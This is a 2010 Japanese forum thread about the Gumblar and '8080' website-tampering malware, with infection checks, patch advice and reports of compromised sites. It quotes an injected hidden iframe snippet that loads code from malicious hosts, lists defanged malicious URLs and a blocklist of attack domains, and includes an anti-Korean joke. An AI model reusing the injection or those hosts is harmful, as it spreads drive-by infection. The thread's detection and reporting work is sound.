【Gumblar/GENO】Web改竄ウイルス総合スレ3【8080】
【8080系ウイルスについて】
メディアなどでは「ガンブラー(の亜種)」と紹介されていますが
Gumblar系とは別種のウイルスで、最近のものはページソースの最後あたりに
<script>/*LGPL*/
<script>/*GNU GPL*/
<script>/*CODE1*/
などから始まる難読化したスクリプトが埋め込まれています
2009年12月現在、最新版のAdobe Readerおよびそれ以前の脆弱性を利用しているため
回避策としてAcrobat Javascriptのチェックを外してください
修正版の配布は2010年1月13日の予定です
他にもMicrosoftとJRE(Java Runtime Environment)の脆弱性を
利用していますがこちらはアップデートで対処できます
感染すると他のウイルスなどを呼び込むため非常に危険です
■ 新手の正規サイト改ざんでAdobe Readerのゼロデイ攻撃〜今すぐ対策を
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2106 ■ 感染確認(2000,XP)
あくまで現時点での確認方法であることに注意してください
セーフモードから起動してレジストリエディタでRunエントリ
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
から
"sysgif32"="C:\\WINDOWS\\TEMP\\~TMD.tmp"
"~TM6.tmp"="C:\\WINDOWS\\TEMP\\~TM6.tmp"
等の登録があれば感染済
上記の登録情報を削除した上で
C:\Documents and Settings\ユーザー名\スタート メニュー\プログラム\siszyd32.exe
のファイルを削除すれば復旧しますが、亜種等で違うこともあるので
可能な限りクリーンインストール&サイト持ちは
安全なPCからのパスワードの変更を推奨します
GENO(Gumblar)ウイルス対処法。 行っておくべき事項を箇条書きにしました。 細かなことは他にもいろいろありますが、とりあえず以下を実施して下さい。 (1)Microsoft Update(Windows Update)を実行しシステムを最新の状態にする (2)Adobe Readerを最新版に更新する (3) Adobe ReaderのAcrobat JavaScriptを無効に設定 (4) JRE(Java Runtime Environment)を最新版に更新する (5) Flash Playerを最新版に更新する (6) QuickTimeを最新版に更新する (1)〜(4)を行っていれば、現時点で改ざんサイトを閲覧してもウイルスには感染しない。 攻撃コードは変化する可能性もあるので、念のため全て行っていただきたい。 Adobe Readerなどのアップデート方法については下記のトピックスを参照のこと。 Acrobat JavaScriptを無効にする方法は以下の通り。 (1)Adobe Readerを起動し[編集]メニューの[環境設定]を選択 (2)「分類」の中の「JavaScript」を選択 (3)「Acrobat JavaScriptを使用」のチェックをクリア (4)「OK」ボタンを押す ※サイトを運営されている方は、さらに次のことも実施していただきたい。 (1)管理サイトのページなどに意味不明な文字列が埋め込まれていないか確認する (2)改ざんされていたり、サイト管理に使うパソコンからウイルスが見つかった場合には、 ウイルスに感染していないパソコンを使用して管理サイトのパスワードを変更する
危険ポートを閉じることでセキュリティを強化する。
【ポート135の役割】
Windows2000/XPは、標準で分散オブジェクト技術(以下:DCOM)を利用しています。
このDCOMを利用すると、他のPCのDCOMソフトを遠隔操作できます。
遠隔操作をする場合に、相手PCに問い合わせをする時のに使用するのがポート135です。
場合によっては、遠隔操作をされてしまう可能性があるものですので、このポートは停止しておきましょう。
ポート番号「135」、「リモート管理・操作等のサービスへのアクセス」
■ポート135を閉じる
「コントロールパネル」 -> 「管理ツール」 -> 「サービス」 -> 「Remote Procedure Call」を選択する。
「Remote Procedure Call (RPC) エンド ポイント マッパーや各種の RPC サービスを提供します。」
をダブルクリックし、プロパティを開く。
スタートアップの種類を「無効」にし、OKボタンをクリックしプロパティ画面を閉じる。
変更をしたらPCを再起動する。
ポート番号「445」、「ファイル共有等のサービスへのアクセス」
■ポート445を閉じる
「コントロールパネル」 ->「システム」 ->「ハードウェア」 ->「デバイスマネージャ」の「表示」メニューから
「非表示のデバイスドライバの表示」を選ぶと「プラグアンドプレイではないドライバ」という項目が一覧に加わる。
このツリーを展開して「NetBIOS over TCP/IP」のプロパティを開く。
ここで「ドライバ」タグを選択し、「スタートアップ」の種類を「無効」にする。
変更をしたらPCを再起動する。
ポート135 445
ttp://www.google.com/search?hl=ja&q=%E3%83%9D%E3%83%BC%E3%83%88135+445&lr=lang_ja
【感染確認方法】 msconfigでスタートアップにsiszyd32.exeとTMD.tmpがあったらご愁傷様(感染確定) 削除はネットワークから切り離して、セーフモードで起動させ [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "sysgif32"="C:\\WINDOWS\\TEMP\\~TMD.tmp" 削除 ※sysgif32で検索 ↓ C:\Documents and Settings\ユーザー名\スタート メニュー\プログラム\siszyd32.exe ファイルを削除
以上テンプレ 随時訂正(修正)お願いします
>>5 >>8 ○ C:\Documents and Settings\ユーザー名\スタート メニュー\プログラム\スタートアップ\siszyd32.exe
× C:\Documents and Settings\ユーザー名\スタート メニュー\プログラム\siszyd32.exe
15 :
名無しさん@お腹いっぱい。 :2010/01/19(火) 00:24:51
これって新コードでしか? tp://www.bing.com/search?q=%22document.write%28unescape%28%22+%22hp_d00%28unescape%28%22&go=&form=QBLH&filt=all 検索ワード:"document.write(unescape(" "hp_d00(unescape(" ↓アクセス注意↓ tp://pastebin●com/m52cca06b tp://9jan010-1320●free4r●com/jb●htmlなどなど。
ここにURL貼り付ける人はhttpまで全部消してくれると助かる 専ブラによってはht抜いた程度じゃリンクしちゃうからTOPに自動で飛ばすページだとURLによっては踏む可能性がある
20 :
名無しさん@お腹いっぱい。 :2010/01/19(火) 11:53:28
>>18 の//よりあと(wwwから)が直リンされてるからhttp抜いても無駄じゃね?
素人じゃないんだから踏まなきゃいいんだよ
つーか●使えって書いてあんだろ
genius.jpn●org ノートン先生に祭り上げられてるから見てみたら Trojan-Downloader.JS.Agent.ewo反応 のソースチェッカーで見たら明らかに一番下に変なソースが入っているからGENOっぺぇお
「いわゆるGENO系ウイルスに感染してみた」シリーズが面白かったw
>>25 アスクル、アスクルアリーナの代理店だそうだ
感染した
>>20 クリックする気が無いところでクリックしてしまったり、マウスポインタが意図せず動いたりしたことはない?
タッチパッド使ってるし、踏めないようになってると安心なんだけど
タッチパッドなら誤クリックもありそうだな 図面や絵を扱ってるとタッチパッドじゃ仕事にならないから使わないが
面倒でもマウスを繋ぎなさいってこった
専ブラでURL踏んだときはわんくっしょん噛むようになってるし
踏んでも感染先に飛ばないように●つかってるんじゃん
>>34 たまに直リンしちゃって騒いでる人がおるがなw
36 :
名無しさん@お腹いっぱい。 :2010/01/19(火) 14:14:21
>>36 ごめん俺少数派のゾヌ2なのよね
普通はワンクッション切ってる人のが多そうだしな
何で開くか選択する画面が出るんだわ
ゾヌか規定のブラウザか簡易ビューアか?みたいな
40 :
名無しさん@お腹いっぱい。 :2010/01/19(火) 14:41:33
立派なお名前なのに感染してるとガッカリ感がパネエ
>>36 おもいきってブラウザ指定のパスに存在しないファイル名を書いておくとかすると
開かないようになる・・・かな??
>>36 JaneViewなら
設定→機能→「画像で全拡張子をビューアで処理」にチェック
>>39 探偵屋の元締め?
裏情報いっぱいありそうで流出やばくね?
ゾヌは至れり尽くせりの多機能だが重いぞ〜w
あと、ブラウザのパスにlynxを指定するとか
47 :
名無しさん@お腹いっぱい。 :2010/01/19(火) 14:48:06
>>42 それをテキストファイルに指定してる
踏むなとか書いた
http://blog.fc2.com/info/blog-entry-531.html FC2が注意喚起をした
>■ 危険防止について
>二次感染、三次感染を防ぐためにも、下記の点にご注意ください。
> * Windows Update を行う
> * Adobe Acrobat 及び Adobe Reader を最新にする
> * Adobe Flash Player を最新にする
> * Java Applet や ActiveX の設定を OFF にする
> * 見覚えのない怪しいリンクは開かない
> * ウィルス対策ソフトをインストールする
> * ウイルス定義ファイルを更新する
んん〜
■Gumblar&Gumblar.x 現在冬眠中だが、ひっそり動いてるかもしれない ■8080系(巷ではGumblar亜種と呼ばれている) /*GNU GPL*/:進化して/*LGPL*/になった。 /*CODE1*/:現在進化中につき要注意。 世界各地で毎日絶賛バージョンアップ中w ※/*CODE1*/(新型?)の検索は 検索ワード:"document.write(unescape(" "hp_d00(unescape(" 注:GoogleよりBingのほうが絞り込める ■何故かスルーされる亜種っぽいやつ <script>function〜:8080系の亜種? 検索ワード:"<script>function" "return String.fromCharCode(c);" "getElementById(" ※ちまちま増えてるから注意が必要
52 :
名無しさん@お腹いっぱい。 :2010/01/19(火) 15:25:15
アスクル代理店 株式会社丸吉 現状メンテナンス中
+にスレ立ってるね NHKのソースで
>>39 カスペだと、↓こんなん出ました
社団法人日本調査業協会
2010/01/19 15:51:40 検出しました: HEUR:Trojan-Downloader.Script.Generic
http://www ●nittyokyo●or●jp/
>>46 テキストブラウザ良いな。
俺はもっとマイナーなHTML2にしている。
AVGはノーガード戦法
おい 重複してんぞ どうなってんだ
tp://gamble●xrea●jp/ URLで吹いたwww
Squid Proxy Server を経由してネットを使っています。推奨されるブロックの方法を おでん授頂ければと思います。
牛筋オヌヌメ
関東に住むまで竹輪麩を知らなかった
>61 玉子と大根とからしがあればご飯何杯でもいける!
おでんには味噌だ
===== 以下おでん雑談スレ =====
以上にしといたれよw
やっぱり サボテンだろ
70 :
名無しさん@お腹いっぱい。 :2010/01/19(火) 18:17:46
===== 以上今日の晩ご飯雑談スレ ====
サボテンのサラダは意外にいける<これマジ
>>39 一日に300アクセスあるそうです
日本の探偵業の方々感染してるかも
すげー時代
今気づいたけど ギャンブラー(ばくちうち)は、gamblerで ガンブラーはgumblarだったんだな。
300だと個人サイトでも「ああそうですか」レベルだよなー 被害者も少なくていいわけだが
>>78 アロエは蜂蜜に漬ければなんとか食えるな
身体によさげ
あまり関係ないが、Gumblar Checker2だけど IE8で互換性表示offで見るとIEが動作停止するのは俺だけ?
>81 自分もだ。 何度も何度も何度も何度も何度も何度m 途切れて見られない。 でも、入力したサイトによるんだよね。何でかな。
Noscriptあれば負ける気しねえ
Noscriptは作者の守銭奴っぷりがウザい。
ありゃ守銭奴とはいわんだろ
乞食だよな(失笑)
この前一年ぶりぐらいで入れてみたら相変わらず自サイトに誘導しやがったんで速攻消したわ。 謝罪はしても反省はしないような人間なんだろうな。 そんなにまでして広告収入が欲しいのかね?
>>81 ,82
申し訳ございません。
ハイライト表示に使っているSyntaxHighlighterの一部機能がIE8と相性が悪いようで、この機能を無効にすることで修正しました
>90 うわ、作者様!さすが対応素早い、ありがとう! こちらこそものすごくお世話になってます。
ロッテのトップページ、Gamblar Checker2で改ざんって出た
94 :
名無しさん@お腹いっぱい。 :2010/01/19(火) 20:21:35
社団法人日本調査業協会 修正してあるけどお知らせ無しですか
>>94 その立場にしてコンプライアンス無視
いいねえ〜w
97 :
名無しさん@お腹いっぱい。 :2010/01/19(火) 20:31:42
>>94 人の事は調査するけども自分のことを調査されるのは嫌いですってか
>95 ごめん見方間違えた、「改ざんされた可能性があります」ってのはサイトの本文か。 ほんとに検出されたら「表示しない」って出るんだね。 ロッテさんみなさん、失礼。
白痴ランドが出てくるってがいしゅつ?
なにそれ
>>16 の書庫に入ってるMalwareってのが本体なのか?
そりゃ無理だ。現物が出てこねーと話にならん。
>>101 IE以外にしてjavascriptをきればいい
105 :
名無しさん@お腹いっぱい。 :2010/01/19(火) 21:56:53
全然ダメだな
この手のGumblar系ウィルスって、どうして改竄したサイトから 撒布サイトに対してリダイレクトさせるんだろう? 改竄できるくらいなら、そのサイトに直接ウィルスを置けるのに。 あえてワンクッション入れるのには何か意味あるの?
ウイルス本体を鯖に置くと鯖の対ウイルス装置に即検出される
規制されているから手短に。 h++p://anian.just-size●net/ Wepawetによると8080にやられてるっぽい。 AntiVir PersonalではJS/Agent.Bay.1で検出。
>>107 中国でIEが標的になってpwが盗まれたらしいよ。
111 :
名無しさん@お腹いっぱい。 :2010/01/19(火) 22:20:54
6だけな
114 :
名無しさん@お腹いっぱい。 :2010/01/19(火) 22:54:14
攻撃されたのは6だけだが、同じ脆弱性は5以外6・7・8みんなもっているぜ
>>115 ありがとう。こっちはJPCERT/CCにインシデント報告しておきました。
JPCERTが具体的に何をするのかはわかりませんが。
改竄されるファイルは index.html index.htm index.php *.js ↑の他もある?
最強のウイルス対策 1 2階に上がる 2 パソコンを持つ 3 思いっきり投げ捨てる これでおk
鯖管には法律上の罰則が必要だな
もうボロボロじゃんか なにやってんだ馬鹿ヤロー
>>121 いつも乙です
ところで、どうやってそれだけの検体を?本体マルウェアとか
>>123 IE6、IE7、IE8それぞれに脆弱性が存在する。
IE6は即アウトだがIE7、IE8はデータ実行防止DEPを有効にすれば一応凌げる。
IE7は詳細設定から「オンラインからの攻撃の緩和に役立てるため、メモリ保護を有効にする」 をクリック。
IE8はディフォでデータ実行防止DEPが有効。
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄」
―――――――――――――‐┬┘
|
>>118 ____.____ | .__ いらないPCを
| | | | |\_\ 窓から投げ捨てろ
| | ∧_∧ | | | |.◎.|
| |( ´∀`)つ ミ | | |.: |
| |/ ⊃ ノ | | .\|.≡.|
 ̄ ̄ ̄ ̄' ̄ ̄ ̄ ̄ |  ̄ ̄
>>128 ,,-' _,,-''" "''- ,,_  ̄"''-,,__ ''--,,__
,,-''" ,, --''"ニ_―- _ ''-,,_ ゞ "-
て / ,,-",-''i|  ̄|i''-、 ヾ {
(" ./ i {;;;;;;;i| .|i;;;;;;) ,ノ ii
,, ( l, `'-i| |i;;-' ,,-'" _,,-"
"'-,, `-,,,,-'--''::: ̄:::::::''ニ;;-==,_____ '" _,,--''"
 ̄"''-- _-'':::::" ̄::::::::::::::::;;;;----;;;;;;;;::::`::"''::---,,_ __,,-''"
._,,-'ニ-''ニ--''" ̄.i| ̄ |i-----,, ̄`"''-;;::''-`-,,
,,-''::::二-''" .--i| .|i "- ;;:::`、
._,-"::::/  ̄"''--- i| |i ヽ::::i
.(:::::{:(i(____ i| .|i _,,-':/:::}
`''-,_ヽ:::::''- ,,__,,,, _______i| .|i--__,,----..--'''":::::ノ,,-'
"--;;;;;;;;;;;;;;;;;""''--;;i| .|i二;;;;;::---;;;;;;;::--''"~
 ̄ ̄"..i| .|i
.i| |i
i| |i
.i| .|i
.i| |i
.i| ,,-、 、 |i
i| ノ::::i:::トiヽ、_.|i
_,, i|/"ヽ/:iヽ!::::::::ノ:::::Λ::::ヽ|i__n、ト、
,,/^ヽ,-''":::i/::::::::/:::::|i/;;;;;;/::::;;;;ノ⌒ヽノ::::::::::::ヽ,_Λ
;;;;;;:::::;;;;;;;;;;:::::;;;;;;;;:::/;;;;;;:::::::::;;;;;;/;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::::::::::;;:;;;;:::ヽ
二番煎じイクナイ
ttp://www ●s-palcall●com/?download.php?file=602037
何となく鑑定スレ見てたらこんなのが依頼されてた
これからは短縮URLサービス使ったトラップも増えていくだろうし2chもおっかないのう
.__ |\_\ | |.◎.| | |.: | .\|.≡.|  ̄ ̄ _,,_ ∩ (^Д^)/ ⊂ ノ とったどー (つ ノ (ノ
i |i li| il| . | 百 |; ガッ ;.:|___d._|;' ☆(;。∀゚)←>>*** /⊃ ⊃
最近、本当に洒落になってないな・・・ 普通にweb巡回するだけでノートンの糞アドオンが真っ赤になる始末 今までだと掲示板系サイトの誤爆で済んでたがソース元を見るとjs絡みのtrojanと明らかにアレ臭い 動画サイトは思いっきりJS開いてるんだがflashの方のadobe側の対応は間に合っているのかな・・・
落ち着くまで専ブラで2ch見るだけにしといた方がいいな ・・・と思ったのが去年の四月でした
専ブラは専ブラで直リン馬鹿のせいで反応しまくってうざいし困ったもんだ
>>135 却ってエロサイトの方が管理をしっかりやってるのが多い気がする。
Avast!5.0発表
同人サイトの感染率の高さは異常 他板に専用対策スレがあるのも納得
今しがたNHKでガンブラー特集やってたけど 対策はウィルスソフト更新しろとしか言わないのな JAVA、PDF云々は言わないってのはやっぱなんか裏にあるのかな?
キーロガーの実験失敗しててわろた。
| | { ! _,, -ェェュ、 | ィ彡三ミヽ `ヽ ,ィハミミミミミミミミミヽ、| 彡'⌒ヾミヽ `ー /ililハilミilミliliミliliミliliミ| ヾ、 /iiiiイ!ヾヾミ、ミニ=ー-ミ| _ `ー―' i!ハ:.:.\\_::::::::::::::/:.| NHKは 彡三ミミヽ i! ヽ:.:.:.:冫': : :::/,,∠| 彡' ヾ、 _ノ i!::: ̄二ー:: : ::::ソ ・ ,| 太陽と煉瓦に `ー ' {ヘラ' ・_>シ;テツ"''''"| ,ィ彡三ニミヽ __ノ ヽヘ`" 彡' 〈 | 監視されて 彡' ` ̄ `\ ー-=ェっ | _ __ ノ {ミ;ヽ、 ⌒ | います ,ィ彡'  ̄ ヾミミミミト-- ' | ミ三彡' /⌒ / ̄ ̄ | : ::::::::::| ィニニ=- ' / i `ー-(二つ ,ィ彡' { ミi (二⊃ // / l ミii ト、二) 彡' __,ノ | ミソ :..`ト-' / | ミ{ :.:.:..:| ノ / ヾ\i、 :.:.:.:.:| ィニ=-- '" / ヾヾiiヽ、 :.:.:.:.::::| / / `/ ̄ ̄7ハヾヾ : .:.:.| ノ _/ / / |:. :.:.:.:.:.:.:|
>>144 素人に細かい設定なんか無理だろって思ってんじゃね?
NHKならPCの苦手な年寄りも多く見てるだろうし
しかしあれだな、設定いじってJAVA切りやなんやしてても前ほど気軽にサイト巡り しなくなってしまった
昨日見かけたURL、マイクロさんがはじめてブロックしました。 ここどーですか? 22 名前: バールのようなもの(不明なsoftbank)[] 投稿日:2010/01/19(火) 18:44:39.14 ID:64+L9xsa 【サンプル動画】 97 名前:名無し募集中。。。[] 投稿日:2010/01/19(火) 16:02:03.04 0 h t t p : / / www.prestige-av.com/ec/index.php?main_page=show_movie&product_model=EVO-118
最近のClamAVのMLを見る限りGumblarの亜種大杉 PDFだけでも20〜30、さらにあったか・・・
>>141 Pandaクラウドになったら検知率上がったみたい
SSLなFTPを使ってる場合でもFTPのIDとパス抜かれることもあるんでしょうか?
JPCERTから確認メールが来たので。 報告した中からgoogleでURLを検索して検索数が多かった被害サイト smartlifestyle.sakura.ne●jp/ 58500 www.iyashisalon-navi●net/ 34200 サイト全体 nakano.main●jp/ 16000 cash-you●com/ 11100 www.f-ture●com/ 9890 monde.client●jp/ 7050 monde.client●jp/monde/02.html とか数ページ eefy.fem●jp/ 6040
CODE1の新型?にくっついてたけど・・
---↓ここから↓---
<iframe umcoq='HwL7BETd' src='h
ttp://liveiframe ●net/s/in●cgi?7 '
tligu='CJyMDWo4' width='0' height='0' style='display:none'></iframe>
<iframe iccmc='nU2hKVfk' src='h
ttp://4analytics ●ws/in●cgi?8 '
wcxjb='QMXsIujE' width='0' height='0' style='display:none'></iframe>
---↑ここまで↑---
今度は「あふぃ」でも始めたのか?
mbspro2●uic●to/user/melraia●html ここやられてる?
ここで報告されてるウイルスってPCサイトビューアーでも感染するのか?
windowsかんけーないから大丈夫
それとこれとは関係ないと思う
>>156 PDF大好きなin.cgiやin.phpはかなり前から見かける。
微妙に別系統(完全に別とは思わんけど)な気がする。
>>7 のポート135閉じようと思ったんだけど、
実行ファイルのパスに
C:\WINDOWS\system32\svchost -k rpcss
とあって、スタートアップの種類が自動から変えられない・・。
これは何なんでしょうか?
>>163 カスペルスキー使ってない?
だとしたら犯人はカスペルスキーだ。
>>163 >>7 はルータ(ブロードバンドルータ含む)があれば普通はアクセスできないから設定不要だよ
【速報】JEITA(電子情報技術産業協会)のサイトが一時停止 〜 Gumblar被害か?
ガムビルアー
>>164 カスペルスキーは使ってないです。ソフトはESET Smart
>>165 なるほどw 了解です
設定変えられないから、ウィルスにでも感染してるのかと心配になったよ。
回答サンクス
何やってんだ > 鯖缶
鯖缶をボッコボコにしてぐつぐつ煮込んで鯖缶缶を作りたい
鯖缶は製造後半年ぐらいからが食べ頃 美味いのは一年目ぐらいだな
つーかGENOが対策を怠ったからこうなったんだろ あいつらは責任とって自決するべきだ あそこまでして業務停止命令が下らないなんて世の中おかしいよ
またGENOとかアホか
癌ブラーはどこまで転移してますか?
>>117 多分他にも。
というかMTのテンプレファイルもやられるっぽい。
MTで作ったサイトが全ページあうあうだった。
しかし、小さな会社だと「改ざんされてたアルよ・・・」って告知するとダメージ大きいよなぁ。
そんな理由で告知しないところが多数なんだけど、やっぱ告知すべきなのかね?
>>176 あー、お疲れ様です。
あ、書き忘れてたけど、avastがようやく8080スクリプトを検出してくれるようになった。
他のソフトどうよ?
Aviraは本体only
>>166 広報に凸してみました
笑ってました(何故?
ttp://www.jeita.or.jp/japanese/about/secret/new_location.htm 新JEITA本部事務所〒101-0065
東京都千代田区西神田3-2-1
千代田ファーストビル南館
総合企画部(企画グループ) TEL:03-5275-7253 / FAX:03-5212-8121
総合企画部(政策グループ) TEL:03-5275-7253 / FAX:03-5212-8121
総合企画部(調査グループ) TEL:03-5275-7255 / FAX:03-5212-8121
総合企画部(広報室) TEL:03-5275-7254 / FAX:03-5212-8123
総合企画部(安全担当) TEL:03-5275-7256 / FAX:03-5212-8121
知的基盤部 TEL:03-5275-7259 / FAX:03-5212-8122
知的基盤部(補償金管理室) TEL:03-5212-8131 / FAX:03-5212-8132
国際部 TEL:03-5275-7263 / FAX:03-5212-8122
環境部 TEL:03-5275-7257 / FAX:03-5212-8121
コンシューマ・プロダクツ部 TEL:03-5275-7260 / FAX:03-5212-8122
コンシューマ・プロダクツ部
(特定プロジェクト推進室) TEL:03-5275-7260 / FAX:03-5212-8122
インダストリ・システム部 TEL:03-5275-7261 / FAX:03-5212-8122
電子部品部
TEL:03-5275-7262 / FAX:03-5212-8122
電子デバイス部 TEL:03-5275-7258 / FAX:03-5212-8121
総務部(総務グループ) TEL:03-5275-7251 / FAX:03-5212-8121
総務部(経理グループ) TEL:03-5275-7252 / FAX:03-5212-8121
総務部(会員サービスグーループ) TEL:03-5212-8255 / FAX:03-5212-8130
関連組織[移転事務所のみ]
有限責任中間法人 ITセキュリティセンター
Information Technology Security Center
〒101-0065 東京都千代田区西神田3-2-1 千代田ファーストビル南館
TEL:03-5212-8271 / FAX:03-5212-8272
>>177 無能管理者のせいで客のPCを被害にあわせてるのに告知しないほうがおかしい
まあ客も馬鹿だけど隠蔽するのは悪質すぎる
182 :
名無しさん@お腹いっぱい。 :2010/01/20(水) 18:51:38
>>176 乙。
デザインが一新されて良い感じ。
右上のガンブラーAAワロスw
>>184 >●ガンブラーとカタカタ表記になるのがイヤなんですが……
カタカタカタカタカタカタカタカタ((((;゚Д゚)))カタカタカタカタカタカタカタカタ
ワロチ
普段ウィルスやセキュリティに無頓着な起業がこういう時にわかるからなー
いままでウィルスにかかっても個人なら個人の問題ですんだが、 これは個人の問題じゃないからな
脳豚2010使ってるんだけど ヤホーとかで検索して 検索結果の右端のマークが緑だったら大丈夫なの? そうならGumblarとか8080にやられていないってことでFA?
俺はjavascriptを使ってるサイトは入らないようにしてる だから今後はjavascriptを使わないサイトが増えるだろう そもそもjavascriptって耳とかヘソにピアスするような感じだろ 消毒しなかったら膿んでくるしね。 あとあと面倒 いらねーよ(´A`)
俺は去年から基本的にJavaはどちらも切ってるな
IE6ではやほー検索するとVB先生のチェックが入って、 サイト名の左に緑(安全)赤(危険)グレー(未チェック)のマークがあったのに、 こないだIE6からIE8にしたら、何も出なくなっちゃって、 サイト行くのが不安だ…。 けっこうあのマーク頼りにしてたのに、IE8はマークなしデフォなの? 教えてえろいひと
聞く相手や場所が違うことに気が付きませんか?
そうでした、ここガンブラスレだった。 みなさん失礼しました
専ブラのプレビュー機能ですらURL検出で反応した時に精神衛生上よくないから切った もう2chで貼られている画像リンクに興味を抱く事もないだろう
専ブラのプレビュー機能ですらURL検出で反応した時に精神衛生上よくないから切った もう2chで貼られている画像リンクに興味を抱く事もないだろう
専ブラのプレビュー機能ですらURL検出で反応した時に精神衛生上よくないから切った もう2chで貼られている画像リンクに興味を抱く事もないだろう
大事な事なので2回(ry じゃなくて、P2鯖の暴発ねw
3回言ってますぜ旦那
WBSで特集か、笑わせてもらうかな。
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄」 ―――――――――――――‐┬┘ | ____.____ | .__ いらない韓国を | | | | |\_\ 窓から投げ捨てろ | | ∧_∧ | | | |.◎.| | |( ´∀`)つ ミ | | |.: | | |/ ⊃ ノ | | .\|.≡.|  ̄ ̄ ̄ ̄' ̄ ̄ ̄ ̄ |  ̄ ̄
はじまた
オワタ
釣りかよ
・・・お前らおやすみ。
ウイルスバスターのファイルスキャンはゴミなのに・・・
STOP刈って上がりやがった
214 :
213 :2010/01/21(木) 00:32:22
誤爆です ごめんなさい
天下り 先の大人の事情
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄」 ―――――――――――――‐┬┘ | ____.____ | .__ いらない韓国を | | | | |\_\ 窓から投げ捨てろ | | ∧_∧ | | | |.韓.| | |( ´∀`)つ ミ | | |.: | | |/ ⊃ ノ | | .\|.国.|  ̄ ̄ ̄ ̄' ̄ ̄ ̄ ̄ |  ̄ ̄
感染した場合、リカバリインストールで対処してもも問題ないのかこれ?
2chの専ブラはIE使ってないやつ使うだろ普通 Doe最高
>>117 main.html
main.php
default-filters.php
>>219 有名どころではギコナビやlive2chはIE仕様
特にlive2chには根強いファンが結構いる
ギコナビはとにかくシンプル且つ初心者向け設計、live2chはjaneには拡張面で負けるが使い易さを追求したタイプ
パルコールは今だ告知無し
電凸のときに嘘でも「ご連絡恐れ入ります」くらい言えない企業なんてそんなもんだろ
東京芸術劇場のサイトが感染したのはどのタイプ?
>>226 公表せずに逃げきろうとしたのか
糞だな
感染の恐れがあるっていうか、相当な数の人間が感染してるだろw
updateしてたら大丈夫でそ
これサイトの管理者が感染してるんだから なんとか大元特定できないのかね?
なんというか管理者にも閲覧者にも馬鹿が多いなあ 考え方が甘いって言うか
そのうち感染してないやつのほうが少なくなるんじゃないか
そこも日本芸術文化振興会という独立行政法人へ天下りした官僚の受け皿。
さすがよく腐熟してらっしゃる
それ何のサイトだっけな ゲーム? やっべ俺逝ったことある?
>>235 McAfee
JS/Redirector.e
microsoft data access components アドオンを実行しようとしています。
httpコロンスラスラkitten●k-click●net/
241 :
名無しさん@お腹いっぱい。 :2010/01/21(木) 23:29:04
>> 230 > なんとか大元特定できないのかね? ホリプロじゃね? Domain Information: [ドメイン情報] [Domain Name] TGG-TS.JP [登録者名] 株式会社 ホリプロ [Registrant] horipro [Name Server] ns1.secure.net [Name Server] ns2.secure.net [登録年月日] 2009/02/05 [有効期限] 2010/02/28 [状態] Active [最終更新] 2010/01/04 14:19:31 (JST)
記事にホリプロってあるしな
新型か?難読化されてないww /*handle exception*/ hxxp://tkfd-shumatsu-gakko●jp/cat15/ avast!, Avira 送付済み
>>244 これってアンチウイルスは対応できないのとちゃう?
>>244 当然、チェッカーにひっかからない
対応出来ないだろこれ
.ru:8080のアドレス集めるしかないのか
こわいっ こわいいい!
>>251 普通のスクリプトになったから。。。
アドレスで反応するようになるかも。。。
>>23 のgenius.jpn●org/も別のスクリプトになってないか?
>>244 Aguseでカスペ反応でた
Trojan.JS.Iframe.hw
>>253 thx
avast!, Avira に提出した
>>244 カスペだと↓こんなん出ました
2010/01/22 0:16:23 検出しました: Trojan.JS.Iframe.hw
http://blogger-com ●fandango●com●charter-net●authentictype●ru:8080/live●com/live●com/sina●com●cn/nhl●com/google●com/
俺たちもいつまで無事でいられるのだろうか。
>>258 これって飛ばされた先に反応してるんであってスクリプトには反応してないってことだよな
>>261 You are right !
だから、JSを切った状態では反応しなかったよwww
aguseのカスペのバージョンはvirustotalより新しいってことかい
265 :
名無しさん@お腹いっぱい。 :2010/01/22(金) 00:41:36
>>265 こちらの環境では取れないけど
:8080/pics/win.jpg は取れない?
268 :
名無しさん@お腹いっぱい。 :2010/01/22(金) 00:52:57
>>268 ドクペwebのリンクスキャナーも2回に1回しか捕まえられない><
271 :
名無しさん@お腹いっぱい。 :2010/01/22(金) 01:02:41
*.ru:8080のドメインを片っ端から試してるけど、全然引けない 全滅っぽいんだけど、うちだけ?
>>271 DNS は引けるけど 8080 に connect できない
217.23.5.27 authentictype.ru オランダ
8080 Gumblar どっちもサイト改ざんされるの? あと、最近ニュースで Gumblar と言われてるのは このスレでいう 8080(GPL GNU CODE1) のこと?
>>244 とりあえずめるした。
ろりぽにもつーほー
280 :
名無しさん@お腹いっぱい。 :2010/01/22(金) 01:26:02
www●lets-juken●com でウイルスバスターが反応した。
奇跡ktkr
>>280 nikkansports●comとか含まれてるし
ターゲットは日本か
ブラックリスト 補足よろろ ampsguide.ru authentictype.ru burkewebservices.ru carswebnet.ru easylifedirect.ru freeprosports.ru funwebmail.ru guidebat.ru homeproair.ru homesaleplus.ru lagworld.ru suesite.ru superaguide.ru theatticsale.ru theaworld.ru thechocolateweb.ru thelaceweb.ru themobilewindow.ru themobisite.ru viewhomesale.ru webdesktopnet.ru webdirectbroker.ru webnetenglish.ru webnetloans.ru whosaleonline.ru worldsouth.ru worldwebworld.ru
>>280 のsuperpropicks.ruを追加
287 :
280 :2010/01/22(金) 01:36:42
会社のPCにバスターCorpで引っかかったので、インストール中のPCでアクセスしてみた。 WinXPSP3+Winupdate済 IE6 AdobeReader7.10 flashはWindowsのもの gwなし プロキシ有 プロキシのログにはなにものこってなかった。 バスターCorpでスキャンしても何も出なかった。
289 :
280 :2010/01/22(金) 01:44:59
時間がなかったので、一回試しただけ。 何か、ドジったかな。 とりあえず、試したPCは再インストール中でタイムアップとなった。
290 :
名無しさん@お腹いっぱい。 :2010/01/22(金) 01:59:33
Mozilla、Firefox 3.6 正式版を発表!!
新型ウイルス「ガンブラー」対策に有効なプラグインチェックツールを提供、
Firefox 3.6 の入手方法
Windows、Mac、および Linux 版が 70 か国語以上で同時リリースされる Firefox は、他のどのブラウザよりも多くのプラットフォームと言語に対応しています。
Firefox 3.6 は GetFirefox.com から無料でダウンロードできます。なお、Firefox 3.6 は 1 月 22 日 午前 2 時頃よりダウンロード可能となります。
